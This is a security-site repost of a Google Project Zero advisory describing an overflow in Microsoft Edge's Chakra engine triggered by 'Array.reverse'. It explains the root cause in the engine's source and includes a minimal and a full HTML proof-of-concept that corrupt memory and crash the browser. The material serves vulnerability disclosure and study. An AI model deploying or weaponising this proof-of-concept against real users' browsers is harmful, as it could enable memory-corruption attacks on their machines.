首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Microsoft Edge - 'Array.reverse' Overflow 来源：Google Security Research 作者：Google 发布时间：2016-11-21   <!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=925   There is an overflow when reversing arrays in Chakra.   On line 5112 of JavascriptArray::EntryReverse, the length of the array is fetched and stored. It is then passed as a parameter into JavascriptArray::ReverseHelper, which then calls FillFromPrototypes, which can change the size of the array. If the size of the array is set to be larger than it was when the length was fetched, the calculation of the array segment head left value on line 5219:        seg->left = ((uint32)length) - (seg->left + seg->length);   Can become a very large value (as length is larger than seg->length and seg->left is generally 0). This can cause the segment length to become larger than the segment size the next time SparseArraySegmentBase::EnsureSizeInBound is called, as the method contains the following code:           uint32 nextLeft = next ? next->left : JavascriptArray::MaxArrayLength;         Assert(nextLeft > left);           if(size != 0)         {               size = min(size, nextLeft - left);         }   nextLeft can be smaller than the segment length if next is null and left is very large, leading size to be set to a small value which is less than the segment length. Many other methods, including setting an element of an array assume that size is less than length, and often allocate size bytes then copy length bytes, leading to an overflow if length is actually more than size.   A minimal PoC is as follows:   var a = [1]; a.length = 1000; var j = [];   var o = {};   Object.defineProperty(o, '1', {     get: function() {       a.length = 1002;       j.fill.call(a, 7.7);       return 2;     }   });   a.__proto__ = o;   var r = j.reverse.call(a); r.length = 0xfffffffe; r[0xfffffffe - 1] = 10;   A full PoC is attached. Note that this PoC sometimes needs to be refreshed a few times to cause a crash. -->   <html> <head><meta http-equiv="refresh" content="1"> </head> <body> <script>   var a = [1]; a.length = 1000; var j = [];     var o = {};   Object.defineProperty(o, '1', {     get: function() {       //alert('get!');       a.length = 1002;       j.fill.call(a, 7.7);       return 2;     }   });   a.__proto__ = o;   var place = []; for(var i = 0; i < 10; i++){ var r = j.reverse.call(a); r.length = 0xfffffffe; r[0xfffffffe - 1] = 10; var q = [1,2,3,4,5,6,7,8,9,10]; place.push(q); } //alert(place.join());   </script> </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft Edge - 'Array.filter ·Microsoft Edge - 'Array.splice ·Microsoft Edge - 'FillFromProt ·Microsoft Internet Explorer 11 ·Moxa SoftCMS 1.5 - Denial of S ·Microsoft Edge CTextExtractor: ·FTPShell Client 5.24 - 'PWD' R ·Microsoft Edge Scripting Engin ·Nagios 4.2.2 - Privilege Escal ·Putty 0.67 Cleartext Password ·PowerShellEmpire Arbitrary Fil ·Dlink DIR Routers Unauthentica   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved